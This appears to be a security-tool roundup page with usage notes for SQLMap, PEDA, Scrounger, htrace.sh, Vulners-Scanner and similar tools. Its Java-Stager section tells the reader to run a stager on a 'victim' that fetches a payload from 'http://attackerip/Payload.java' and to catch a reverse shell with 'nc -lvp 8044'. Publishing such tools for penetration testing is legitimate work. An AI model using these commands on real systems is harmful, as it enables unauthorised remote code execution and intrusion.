MalwareCMDMonitor – Shows Command Lines Used By Latest Instances Analyzed On Hybrid-Analysis

By using MalwareCMDMonitor python script, you can observe the commands of the latest malware instances executed on hybrid-analysis.com sandbox. In a nutshell, it downloads the HA feed and then retrieves commands of unseen instances; the ones that did not appear in the previous feeds.

Also ReadJava-Stager : A PoC To Download, Compile & Execute A Java File In Memory

Running The MalwareCMDMonitor

To run the script

python  hybrid_analysis.py

However, if you want to run the script on a regular basis, you can use –daemon (or -d for short) switch.

python  hybrid_analysis.py --daemon

Running the above command results in getting the feed every hour. To change the interval, you can use –cycle (or -c) and specify the number of minutes the script must wait before retrieving the feed again.

python  hybrid_analysis.py --daemon --cycle 120

In the above example, the script sleeps for 2 hours between each feed retrieval. Moreover, you can use –output (or -o) to specify the output file that you want to store the results. By default, the output is written on the console.

python  hybrid_analysis.py --daemon --cycle 120 --output "c:\test\ha - cmd.log"

Last but not least, you can see all the switches by using –help (or -h)

python hybrid_analysis.py -h

SQLMap v1.2.9 – Automatic SQL Injection & Database Takeover Tool

SQLMap v1.2.9 is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMap v1.2.9 Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Also Read WinPwnage – Elevate, UAC Bypass, Privilege Escalation, dll Hijack Techniques

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples.

Screenshots

Credit: Netsparker Web Application Security Scanner

Peda – Python Exploit Development Assistance for GDB

PEDA is a python exploit development assistance for GDB.

Features

  • Enhance the display of gdb: colorize and display disassembly codes, registers, memory information during debugging.
  • Add commands to support debugging and exploit development (for a full list of commands use peda help):
    • aslr — Show/set ASLR setting of GDB
    • checksec — Check for various security options of binary
    • dumpargs — Display arguments passed to a function when stopped at a call instruction
    • dumprop — Dump all ROP gadgets in specific memory range
    • elfheader — Get headers information from debugged ELF file
    • elfsymbol — Get non-debugging symbol information from an ELF file
    • lookup — Search for all addresses/references to addresses which belong to a memory range
    • patch — Patch memory start at an address with string/hexstring/int
    • pattern — Generate, search, or write a cyclic pattern to memory
    • procinfo — Display various info from /proc/pid/
    • pshow — Show various PEDA options and other settings
    • pset — Set various PEDA options and other settings
    • readelf — Get headers information from an ELF file
    • ropgadget — Get common ROP gadgets of binary or library
    • ropsearch — Search for ROP gadgets in memory
    • searchmem|find — Search for a pattern in memory; support regex search
    • shellcode — Generate or download common shellcodes.
    • skeleton — Generate python exploit code template
    • vmmap — Get virtual mapping address ranges of section(s) in debugged process
    • xormem — XOR a memory region with a key

PEDA Installation

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Also Readhtrace.sh – Simple Shell Script To Debugging Http/Https Traffic Tracing

Screenshot

KisMac2 – Free Open Source Wireless Stumbling & Security Tool For Mac OS X

KisMAC2 is a free, open source wireless stumbling and security tool for Mac OS X. This project, is an active project to continue where original development of KisMac has stopped. The Trac for the original KisMac is at http://trac.kismac-ng.org

Also ReadScrounger – Mobile Application Testing Toolkit

What’s new:

  • Mac OS 10.9 – 10.12 (64-bit only)
  • ARC (64-bit only)
  • New GUI
  • Modern Objective-c syntax
  • Rewrote most part of deprecated methods
  • Remove debug info from release

How To Build KisMAC2:

git clone https://github.com/IGRSoft/KisMac2.git ./KissMac2
cd KissMac2
git submodule update --init --recursive
open KisMac2.xcworkspace
Build

Credit: Vitalii Parovishnyk (Korich)

Java-Stager : A PoC To Download, Compile & Execute A Java File In Memory

A PoC Java-Stager which can download, compile, and execute a Java file in memory.

The key parts of the talk for me are:

  • Load a Stager onto victim (touches disk, but is a benign binary)
  • Stager downloads raw code over HTTP (which stays in memory)
  • Stager compiles raw code (also in memory)
  • Stager then executes compiled code (also in memory)

Also Read theZoo – A Repository Of LIVE Malwares For Your Own Joy & Pleasure

How To Use Java-Stager

  • Clone down the entire repository.
  • Open it in an IDE which can use maven (such as NetBeans)
  • The Stager, and the example payload are available in the “/src/main/java” folder.
  • Alter the Stager as you would like and compile the project. I was using “clean/build” in the default profile.

The output in NetBeans Included a line like this:

Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

To work on your victim you must upload the “JavaStager*.jar” file and the “lib” folder containing Janino from the “target” folder.

The following command will execute the stager:

java -jar JavaStager-0.1-initial.jar

You will be prompted with the usage as shown:

Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

The “url” is the only parameter that is passed to Stager. An example usage would be:

java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Your payload must be in a file called “Payload.java” and your exploit code must be in a static method called “Run”. The following shows the template if you want to write your own:

public class Payload {
   public static void Run() {
      // Your code here
   }
}

I have provided an example Reverse TCP payload in the file “TCPReverseShell.java”. To prevent name clashes this is not called “Payload.java” and the class name is wrong. The header comment in “TCPReverseShell.java” explains how to modify it to work.

You will need to host your “Payload.java” file on an HTTP server. The attacker will need to start a netcat listener to catch the connection back using the standard nc -lvp 8044 technique.

Credit: James Williams

htrace.sh – Simple Shell Script To Debugging Http/Https Traffic Tracing

htrace.sh simple shell script to debugging http/https traffic tracing, response headers and mixed-content. Scanning domain using Nmap NSE Library. Support external security tools: Mozilla Observatory and SSL Labs API.

htrace.sh is a shell script that allows you to validate your domain configuration and catch any errors (e.g. redirect loops). It also displays basic information about the ssl configuration (if available), response headers, checks for mixed content and performs security scans using Nmap scripts and great external tools such as Ssllabs or Mozilla Observatory.

Also Read WinPwnage – Elevate, UAC Bypass, Privilege Escalation, dll Hijack Techniques

Functions

It is useful for:

  • Checking properly domain configuration (web servers/reverse proxies)
  • redirects analysis, e.g. to eliminate redirect loops
  • checking response headers for each request
  • checking basic ssl configuration
    • validation of the certificates (date, cn, san) and verification ssl connection
  • scanning domain for Mixed Content
  • scanning domain using Nmap NSE Library
  • scanning domain with external security tools: Mozilla Observatory and SSL Labs API

Note: Before use htrace.sh please see Requirements.

How To Use htrace.sh

It’s simple:

# Clone this repository
git clone https://github.com/trimstray/htrace.sh

# Go into the repository
cd htrace.sh

# Install
./setup.sh install

# Run the app
htrace.sh --domain https://google.com
  • symlink to bin/htrace.sh is placed in /usr/local/bin
  • man page is placed in /usr/local/man/man8

External Tools

htrace.sh support external tools for security scans:

  • Mozilla Observatory – cli version of observatory.mozilla.org
    with params: --format=report --rescan --zero --quiet
  • Ssllabs – command-line reference-implementation client for SSL Labs API
    with params: -quiet -grade
  • mixed-content-scan – cli tool for check HTTPS-enabled website for Mixed Content
    with params: -user-agent \"$_user_agent\" --no-check-certificate
  • Nmap NSE Library – provide automated security scans with Nmap
    with scripts:

    • http-auth-finder
    • http-chrono
    • http-cookie-flags
    • http-cors
    • http-cross-domain-policy
    • http-csrf
    • http-dombased-xss
    • http-git
    • http-grep
    • http-internal-ip-disclosure
    • http-jsonp-detection
    • http-malware-host
    • http-methods
    • http-passwd
    • http-phpself-xss
    • http-php-version
    • http-robots.txt
    • http-sitemap-generator
    • http-shellshock
    • http-stored-xss
    • http-unsafe-output-escaping
    • http-useragent-tester
    • http-vhosts
    • http-xssed
    • ssl-enum-ciphers
    • whois-ip

If you don’t know how to install these tools and where they should be placed, please see in Dockerfile where exactly every step is described.

Note: When scanning for mixed content and nmap scripting engine, remember that it may take a long time before the entire site is checked.

Reports

If you want to generate a report in html format, use the ansi2html.sh tool. A detailed description of use:

htrace.sh -d https://nmap.org -s -h | ansi2html --bg=dark > report.html

Build image

cd htrace.sh/build
docker build --rm -t htrace.sh -f Dockerfile .

Run container

docker run --rm -it --name htrace.sh htrace.sh -d http://nmap.org -h

Parameters

Provides the following options:

    htrace.sh v1.0.6

Usage:
    htrace.sh <option|long-option>

  Examples:
    htrace.sh --domain https://example.com
    htrace.sh --domain https://example.com -s -h --scan ssllabs

  Options:
        --help                                show this message
        -d|--domain <domain_name>             set domain name
        -s|--ssl                              show ssl server/connection params
        -h|--headers                          show response headers
        --scan <all|observatory|ssllabs>      scan domain with external security tools
        --mixed-content                       scan website for mixed content
        --nse                                 scan website with nmap nse library
        --user-agent <val>                    set 'User-Agent' header
        --max-redirects <num>                 set max redirects (default: 10)
        --timeout <num>                       set max timeout (default: 15)

Credit: GPLv3

Scrounger – Mobile Application Testing Toolkit

Scrounger is a mobile application toolkit. The word Scrounger means a person who borrows from or lives off others. There is no better description for this tool for two main reasons, the first is because this tool takes inspiration from many other tools that have already been published, the second reason is because it lives off mobile application’s vulnerabilities.

The main features Scrounger offers that others don’t:

  • Works with Android and iOS
  • Metasploit-like console and modules
  • Offers a variety of modules that can be run to give the pentester a starting point
  • Easily extendable

Even though several other mobile application analysis tools have been developed, there is no one tool that can be used for both android and ios and can be called a “standard” must use on every mobile application assessment.

The idea behind this mobile application is to make a metasploit-like tool that will not do a pentesters work but help the pentester on his assessment by executing mundane tasks that need to be performed on all assessments.

Also Read Vulners-Scanner : Vulnerability Scanner Based On Vulners.com Audit API

Scrounger Installation

git pull https://github.com/nettitude/scrounger.git
cd scrounger
bash setup.sh
pip install -r requirements.txt
python setup.py install

Development

git pull https://github.com/nettitude/scrounger.git
cd scrounger
bash setup.sh
pip install -r requirements.txt
python setup.py develop

Update

cd scrounger
git pull
python setup.py install --upgrade

Install Scripts

Linux

# install iproxy lsusb
sudo apt-get install libimobiledevice usbutils

# install jd-cli
if [ ! -x "$(which jd-cli)" ]; then
    curl -L -o /tmp/jdcli.zip https://github.com/kwart/jd-cmd/releases/download/jd-cmd-0.9.2.Final/jd-cli-0.9.2-dist.zip
    unzip /tmp/jdcli.zip /usr/local/share/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli /usr/local/bin/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli.jar /usr/local/bin/jd-cli.jar
    rm -rf /tmp/jdcli.zip
fi

# install apktool
if [ ! -x "$(which apktool)" ]; then
    mkdir /usr/local/share/apktool
    curl -L -o /usr/local/share/apktool/apktool https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/osx/apktool
    curl -L -o /usr/local/share/apktool/apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.3.3.jar
    chmod +x /usr/local/share/apktool /usr/local/share/apktool/apktool.jar
    ln -s /usr/local/share/apktool /usr/local/bin/apktool
    ln -s /usr/local/share/apktool.jar /usr/local/bin/apktool.jar
fi

# install dex2jar
if [ ! -x "$(which d2j-dex2jar)" ]; then
    curl -L -o /tmp/d2j.zip https://github.com/pxb1988/dex2jar/files/1867564/dex-tools-2.1-SNAPSHOT.zip
    unzip /tmp/d2j.zip -d /tmp/d2j
    dirname=$(ls --color=none /tmp/d2j)
    mv /tmp/d2j/$dirname /usr/local/share/d2j-dex2jar
    ln -s /usr/local/share/d2j-dex2jar/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar.sh
    ln -s /usr/local/share/d2j-dex2jar/d2j-apk-sign.sh /usr/local/bin/d2j-apk-sign.sh
    rm -rf /tmp/d2j.zip
fi

if [ ! -x "$(which d2j-dex2jar)" ]; then
    ln -s /usr/local/bin/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar
fi

# install adb
if [ ! -x "$(which adb)" ]; then
    curl -L -o /tmp/platform-tools.zip https://dl.google.com/android/repository/platform-tools-latest-linux.zip
    unzip /tmp/platform-tools.zip -d /tmp/pt
    mv /tmp/pt/platform-tools /usr/local/share/
    ln -s /usr/local/share/platform-tools/adb /usr/local/bin/adb
    ln -s /usr/local/share/platform-tools/fastboot /usr/local/bin/fastboot
fi

# install ldid
if [ ! -x "$(which ldid)" ]; then
    git clone https://github.com/daeken/ldid.git /tmp/ldid
    cd /tmp/ldid
    ./make.sh
    mv ldid /usr/local/bin/
    cd /tmp
    rm -rf /tmp/ldid
fi

# install jtool
if [ ! -x "$(which jtool)" ]; then
    curl -L -o /tmp/jtool.tar http://www.newosxbook.com/tools/jtool.tar
    mkdir /tmp/jtool
    tar xvf /tmp/jtool.tar -C /tmp/jtool
    mv /tmp/jtool/jtool.ELF64 /usr/local/bin/jtool
    rm -rf /tmp/jtool.tar /tmp/jtool
fi

# install scrounger
git clone git@github.com:nettitude/scrounger.git
cd scrounger
pip install -r requirements.txt
python setup.py install

MacOS

# install iproxy ldid lsusb
brew tap jlhonora/lsusb && brew install lsusb libimobiledevice ldid

# install jd-cli
if [ ! -x "$(which jd-cli)" ]; then
    curl -L -o /tmp/jdcli.zip https://github.com/kwart/jd-cmd/releases/download/jd-cmd-0.9.2.Final/jd-cli-0.9.2-dist.zip
    unzip /tmp/jdcli.zip /usr/local/share/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli /usr/local/bin/jd-cli
    ln -s /usr/local/share/jd-cli/jd-cli.jar /usr/local/bin/jd-cli.jar
    rm -rf /tmp/jdcli.zip
fi

# install apktool
if [ ! -x "$(which apktool)" ]; then
    mkdir /usr/local/share/apktool
    curl -L -o /usr/local/share/apktool/apktool https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/osx/apktool
    curl -L -o /usr/local/share/apktool/apktool.jar https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.3.3.jar
    chmod +x /usr/local/share/apktool /usr/local/share/apktool/apktool.jar
    ln -s /usr/local/share/apktool /usr/local/bin/apktool
    ln -s /usr/local/share/apktool.jar /usr/local/bin/apktool.jar
fi

# install dex2jar
if [ ! -x "$(which d2j-dex2jar)" ]; then
    curl -L -o /tmp/d2j.zip https://github.com/pxb1988/dex2jar/files/1867564/dex-tools-2.1-SNAPSHOT.zip
    unzip /tmp/d2j.zip -d /tmp/d2j
    dirname=$(ls --color=none /tmp/d2j)
    mv /tmp/d2j/$dirname /usr/local/share/d2j-dex2jar
    ln -s /usr/local/share/d2j-dex2jar/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar.sh
    ln -s /usr/local/share/d2j-dex2jar/d2j-apk-sign.sh /usr/local/bin/d2j-apk-sign.sh
    rm -rf /tmp/d2j.zip
fi

if [ ! -x "$(which d2j-dex2jar)" ]; then
    ln -s /usr/local/bin/d2j-dex2jar.sh /usr/local/bin/d2j-dex2jar
fi

# install adb
if [ ! -x "$(which adb)" ]; then
    curl -L -o /tmp/platform-tools.zip https://dl.google.com/android/repository/platform-tools-latest-darwin.zip
    unzip /tmp/platform-tools.zip -d /tmp/pt
    mv /tmp/pt/platform-tools /usr/local/share/
    ln -s /usr/local/share/platform-tools/adb /usr/local/bin/adb
    ln -s /usr/local/share/platform-tools/fastboot /usr/local/bin/fastboot
fi

# install Xcode / command line tools
xcode-select --install

# install scrounger
git clone git@github.com:nettitude/scrounger.git
cd scrounger
pip install -r requirements.txt
python setup.py install

Adding Custom Modules

When installing the application a folder ~/.scrounger will be created. Inside ~/.scrounger will be a folder called modules/custom with the same structure as the default scrounger modules, e.g., analysis/android/module_name.

To create a new custom module just add a new file with the module name you want and it will be included the next time you launch scrounger.

Example

Added the following module (~/.scrounger/modules/custom/misc/test.py):

from scrounger.core.module import BaseModule

class Module(BaseModule):
    meta = {
        "author": "RDC",
        "description": """Just a Test module""",
        "certainty": 100
    }

    options = [
        {
            "name": "output",
            "description": "local output directory",
            "required": False,
            "default": None
        },
    ]

    def run(self):

        print("This is a print from the custom module")

        return {
            "print": "This will be print by scrounger's console."
        }

Execution

$ scrounger-console
Starting Scrounger console...

scrounger > list custom/misc

Module            Certainty  Author  Description
------            ---------  ------  -----------
custom/misc/test  100%       RDC     Just a Test module

scrounger > use custom/misc/test

scrounger custom/misc/test > options

Global Options:

    Name    Value
    ----    -----
    device
    output  /tmp/scrounger-app

Module Options (custom/misc/test):

    Name    Required  Description             Current Setting
    ----    --------  -----------             ---------------
    output  False     local output directory  /tmp/scrounger-app

scrounger custom/misc/test > run
This is a print from the custom module
[+] This will be print by scrounger's console.

scrounger custom/misc/test >

Examples

Listing / Searching modules

$ scrounger-console
Starting Scrounger console...

> help

Documented commands (type help <topic>):
========================================
add_device  devices  list     print  results  set   unset
back        help     options  quit   run      show  use


> help list
Lists all available modules

> list ios

Module                                  Certainty Author Description
------                                  --------- ------ -----------
analysis/ios/app_transport_security     90%       RDC    Checks if there are any Application Transport Security misconfigurations
analysis/ios/arc_support                90%       RDC    Checks if a binary was compiled with ARC support
analysis/ios/backups                    90%       RDC    Checks the application's files have the backup flag on
analysis/ios/clipboard_access           75%       RDC    Checks if the application disables clipboard access
analysis/ios/debugger_detection         75%       RDC    Checks if the application detects debuggers
analysis/ios/excessive_permissions      90%       RDC    Checks if the application uses excessive permissions
analysis/ios/file_protection            90%       RDC    Checks the application's files specific protection flags
analysis/ios/full_analysis              100%      RDC    Runs all modules in analysis and writes a report into the output directory
analysis/ios/insecure_channels          50%       RDC    Checks if the application uses insecure channels
analysis/ios/insecure_function_calls    75%       RDC    Checks if the application uses insecure function calls
analysis/ios/jailbreak_detection        60%       RDC    Checks if the application implements jailbreak detection
analysis/ios/logs                       60%       RDC    Checks if the application logs to syslog
analysis/ios/passcode_detection         60%       RDC    Checks if the application checks for passcode being set
analysis/ios/pie_support                100%      RDC    Checks if the application was compiled with PIE support
analysis/ios/prepared_statements        60%       RDC    Checks if the application uses sqlite calls and if so checks if it also uses prepared statements
analysis/ios/ssl_pinning                60%       RDC    Checks if the application implements SSL pinning
analysis/ios/stack_smashing             90%       RDC    Checks if a binary was compiled stack smashing protections
analysis/ios/third_party_keyboard       65%       RDC    Checks if an application checks of third party keyboards
analysis/ios/unencrypted_communications 80%       RDC    Checks if the application implements communicates over unencrypted channels
analysis/ios/unencrypted_keychain_data  70%       RDC    Checks if the application saves unencrypted data in the keychain
analysis/ios/weak_crypto                60%       RDC    Checks if the application uses weak crypto
analysis/ios/weak_random                50%       RDC    Checks if a binary uses weak random functions
analysis/ios/weak_ssl_ciphers           50%       RDC    Checks if a binary uses weak SSL ciphers
misc/ios/app/archs                      100%      RDC    Gets the application's available architectures
misc/ios/app/data                       100%      RDC    Gets the application's data from the remote device
misc/ios/app/entitlements               100%      RDC    Gets the application's entitlements
misc/ios/app/flags                      100%      RDC    Gets the application's compilation flags
misc/ios/app/info                       100%      RDC    Pulls the Info.plist info from the device
misc/ios/app/start                      100%      RDC    Launches an application on the remote device
misc/ios/app/symbols                    100%      RDC    Gets the application's symbols out of an installed application on the device
misc/ios/class_dump                     100%      RDC    Dumps the classes out of a decrypted binary
misc/ios/decrypt_bin                    100%      RDC    Decrypts and pulls a binary application
misc/ios/install_binaries               100%      RDC    Installs iOS binaries required to run some checks
misc/ios/keychain_dump                  100%      RDC    Dumps contents from the connected device's keychain
misc/ios/local/app/archs                100%      RDC    Gets the application's available architectures
misc/ios/local/app/entitlements         100%      RDC    Gets the application's entitlements from a local binary and saves them to file
misc/ios/local/app/flags                100%      RDC    Gets the application's compilation flags using local tools. Will look for otool and jtool in the PATH.
misc/ios/local/app/info                 100%      RDC    Pulls the Info.plist info from the unzipped IPA file and saves an XML file with it's contents to the output folder
misc/ios/local/app/symbols              100%      RDC    Gets the application's symbols out of an installed application on the device
misc/ios/local/class_dump               100%      RDC    Dumps the classes out of a decrypted binary
misc/ios/pull_ipa                       100%      RDC    Pulls the IPA file from a remote device
misc/ios/unzip_ipa                      100%      RDC    Unzips the IPA file into the output directory

Using Misc Module

$ scrounger-console
Starting Scrounger console...

> use misc/android/decompile_apk

misc/android/decompile_apk > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (misc/android/decompile_apk):

    Name   Required Description                Current Setting
    ----   -------- -----------                ---------------
    output True     local output directory     /tmp/scrounger-app
    apk    True     local path to the APK file

misc/android/decompile_apk > set output scrounger-demo-output

misc/android/decompile_apk > set apk ./a.apk

misc/android/decompile_apk > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (misc/android/decompile_apk):

    Name   Required Description                Current Setting
    ----   -------- -----------                ---------------
    output True     local output directory     scrounger-demo-output
    apk    True     local path to the APK file ./a.apk

misc/android/decompile_apk > run
2018-05-01 10:29:53 -                  decompile_apk : Creating decompilation directory
2018-05-01 10:29:53 -                  decompile_apk : Decompiling application
2018-05-01 10:29:59 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 10:29:59 -                       manifest : Creating manifest object
[+] Application decompiled to scrounger-demo-output/com.eg.challengeapp.decompiled

Using results from other modules

misc/android/decompile_apk > show results

Results:

    Name                             Value
    ----                             -----
    com.eg.challengeapp_decompiled scrounger-demo-output/com.eg.challengeapp.decompiled

misc/android/decompile_apk > use analysis/android/permissions

analysis/android/permissions > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (analysis/android/permissions):

    Name           Required Description                                        Current Setting
    ----           -------- -----------                                        ---------------
    decompiled_apk True     local folder containing the decompiled apk file
    permissions    True     dangerous permissions to check for, seperated by ; android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CA

analysis/android/permissions > print option permissions

Option Name: permissions
Value: android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CALLS;android.permission.READ_LOGS;android.permission.READ_SMS;android.permission.READ_CALL_LOG;android.permission.RECORD_AUDIO;android.permission.MANAGE_ACCOUNTS;android.permission.RECEIVE_SMS;android.permission.RECEIVE_MMS;android.permission.WRITE_CONTACTS;android.permission.DISABLE_KEYGUARD;android.permission.WRITE_SETTINGS;android.permission.WRITE_SOCIAL_STREAM;android.permission.WAKE_LOCK

analysis/android/permissions > set decompiled_apk result:com.eg.challengeapp_decompiled

analysis/android/permissions > options

Global Options:

    Name   Value
    ----   -----
    device
    output /tmp/scrounger-app

Module Options (analysis/android/permissions):

    Name           Required Description                                        Current Setting
    ----           -------- -----------                                        ---------------
    decompiled_apk True     local folder containing the decompiled apk file    result:com.eg.challengeapp_decompiled
    permissions    True     dangerous permissions to check for, seperated by ; android.permission.GET_TASKS;android.permission.BIND_DEVICE_ADMIN;android.permission.USE_CREDENTIALS;com.android.browser.permission.READ_HISTORY_BOOKMARKS;android.permission.PROCESS_OUTGOING_CA

analysis/android/permissions > run
2018-05-01 10:54:58 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 10:54:58 -                       manifest : Creating manifest object
2018-05-01 10:54:58 -                    permissions : Analysing application's manifest permissions
[+] Analysis result:
The Application Has Inadequate Permissions
    Report: True
    Details:
* android.permission.READ_SMS

Using devices

$ scrounger-console
Starting Scrounger console...

> show devices

Added Devices:

    Scrounger ID Device OS Identifier
    ------------ --------- ----------

> add_device
android  ios

> add_device android 00cd7e67ec57c127

> show devices

Added Devices:

    Scrounger ID Device OS Identifier
    ------------ --------- ----------
    1            android   00cd7e67ec57c127

> set global device 1

> options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

> use misc/list_apps

misc/list_apps > options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

Module Options (misc/list_apps):

    Name   Required Description            Current Setting
    ----   -------- -----------            ---------------
    output False    local output directory /tmp/scrounger-app
    device True     the remote device      1

misc/list_apps > unset output

misc/list_apps > options

Global Options:

    Name   Value
    ----   -----
    device 1
    output /tmp/scrounger-app

Module Options (misc/list_apps):

    Name   Required Description            Current Setting
    ----   -------- -----------            ---------------
    output False    local output directory
    device True     the remote device      1

misc/list_apps > run
[+] Applications installed on 00cd7e67ec57c127:

com.android.sharedstoragebackup
com.android.providers.partnerbookmarks
com.google.android.apps.maps
com.google.android.partnersetup
de.codenauts.hockeyapp
...

Command Line Help

$ scrounger --help
usage: scrounger [-h] [-m analysis/ios/module1;analysis/ios/module2]
                 [-a argument1=value1;argument1=value2;]
                 [-f /path/to/the/app.[apk|ipa]] [-d device_id] [-l] [-o]
                 [-p /path/to/full-analysis.json] [-V] [-D]

   _____
  / ____|
 | (___   ___ _ __ ___  _   _ _ __   __ _  ___ _ __
  \___ \ / __| '__/ _ \| | | | '_ \ / _` |/ _ \ '__|
  ____) | (__| | | (_) | |_| | | | | (_| |  __/ |
 |_____/ \___|_|  \___/ \__,_|_| |_|\__, |\___|_|
                                     __/ |
                                    |___/

optional arguments:
  -h, --help            show this help message and exit
  -m analysis/ios/module1;analysis/ios/module2, --modules analysis/ios/module1;analysis/ios/module2
                        modules to be run - seperated by ; - will be run in order
  -a argument1=value1;argument1=value2;, --arguments argument1=value1;argument1=value2;
                        arguments for the modules to be run
  -f /path/to/the/app.[apk|ipa], --full-analysis /path/to/the/app.[apk|ipa]
                        runs a full analysis on the application
  -d device_id, --device device_id
                        device to be used by the modules
  -l, --list            list available devices and modules
  -o, --options         prints the required options for the selected modules
  -p /path/to/full-analysis.json, --print-results /path/to/full-analysis.json
                        prints the results of a full analysis json file
  -V, --verbose         prints more information when running the modules
  -D, --debug           prints more information when running scrounger

Using the command line

$ scrounger -o -m "misc/android/decompile_apk"

Module Options (misc.android.decompile_apk):

    Name   Required Description                Default
    ----   -------- -----------                -------
    output True     local output directory     None
    apk    True     local path to the APK file None

$ scrounger -m "misc/android/decompile_apk" -a "apk=./a.apk;output=./cli-demo"
Excuting Module 0
2018-05-01 11:17:42 -                  decompile_apk : Creating decompilation directory
2018-05-01 11:17:42 -                  decompile_apk : Decompiling application
2018-05-01 11:17:46 -                       manifest : Checking for AndroidManifest.xml file
2018-05-01 11:17:46 -                       manifest : Creating manifest object
[+] Application decompiled to ./cli-demo/com.eg.challengeapp.decompiled

Disclaimer

As a disclaimer, all identified findings by Scrounger should always be manually double checked. When using modules that need an Android or iOS device, Scrounger needs a Rooted or Jailbroken device respectively.

Vulners-Scanner : Vulnerability Scanner Based On Vulners.com Audit API

Vulners-Scanner is a PoC host-based vulnerability scanner, which uses vulners.com API. Detects operating system, collects installed packages and checks vulnerabilities in it. It currently support collecting packages for Debian-based (debian, kali, kali) and Rhel-based (redhat, centos, fedora) operating systems.

Experimental support of detecting vulnerabilities in running docker containers (only advanced script). Need to activate it changing checkDocker=False to checkDocker=True in linuxScanner.py

Also Read Darling – Darwin/Mac OS Emulation Layer For Linux

How To Use Vulners-Scanner

  • Lazy scanner The simplest script to show vulners.com API capabilities. Just run script and it will return all found vulnerabilities:
# git clone https://github.com/videns/vulners-scanner
# cd vulners-scanner
# ./lazyScanner.py
OS Name - debian, OS Version - 8
Total provided packages: 315
{
    "data": {
        "vulnerabilities": [
            "DSA-3644",
            "DSA-3626"
        ],
        "packages": {            
            "openssh-client 1:6.7p1-5+deb8u2 amd64": {
                "DSA-3626": [
                    {
                        "bulletinVersion": "1:6.7p1-5+deb8u3",
                        "providedVersion": "1:6.7p1-5+deb8u2",
                        "bulletinPackage": "openssh-client_1:6.7p1-5+deb8u3_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "openssh-client 1:6.7p1-5+deb8u2 amd64"
                    }
                ]
            }
            "fontconfig-config 2.11.0-6.3 all": {
                "DSA-3644": [
                    {
                        "bulletinVersion": "2.11.0-6.3+deb8u1",
                        "providedVersion": "2.11.0-6.3",
                        "bulletinPackage": "fontconfig-config_2.11.0-6.3+deb8u1_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "fontconfig-config 2.11.0-6.3 all"
                    }
                ]
            },
            "libfontconfig1 2.11.0-6.3 amd64": {
                "DSA-3644": [
                    {
                        "bulletinVersion": "2.11.0-6.3+deb8u1",
                        "providedVersion": "2.11.0-6.3",
                        "bulletinPackage": "libfontconfig1_2.11.0-6.3+deb8u1_all.deb",
                        "result": true,
                        "operator": "lt",
                        "OSVersion": "8",
                        "providedPackage": "libfontconfig1 2.11.0-6.3 amd64"
                    }
                ]
            }
        }
    },
    "result": "OK"
}
Vulnerabilities:
DSA-3644
DSA-3626
  • Advanced scanner. Detect OS in a several ways. Supports running docker containers scan (need to activate manually in a file)
# git clone https://github.com/videns/vulners-scanner
# cd vulners-scanner
# ./linuxScanner.py

             _
__   ___   _| |_ __   ___ _ __ ___
\ \ / / | | | | '_ \ / _ \ '__/ __|
 \ V /| |_| | | | | |  __/ |  \__ \
  \_/  \__,_|_|_| |_|\___|_|  |___/

==========================================
Host info - Host machine
OS Name - Darwin, OS Version - 15.6.0
Total found packages: 0
==========================================
Host info - docker container "java:8-jre"
OS Name - debian, OS Version - 8
Total found packages: 166
Vulnerable packages:
    libgcrypt20 1.6.3-2+deb8u1 amd64
        DSA-3650 - 'libgcrypt20 -- security update', cvss.score - 0.0
    libexpat1 2.1.0-6+deb8u2 amd64
        DSA-3597 - 'expat -- security update', cvss.score - 7.8
    perl-base 5.20.2-3+deb8u4 amd64
        DSA-3628 - 'perl -- security update', cvss.score - 0.0
    gnupg 1.4.18-7+deb8u1 amd64
        DSA-3649 - 'gnupg -- security update', cvss.score - 0.0
    gpgv 1.4.18-7+deb8u1 amd64
        DSA-3649 - 'gnupg -- security update', cvss.score - 0.0

theZoo – A Repository Of LIVE Malwares For Your Own Joy & Pleasure

theZoo purpose is to allow the study of malware and enable people who are interested in malware analysis to have access to live malware, analyses the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.

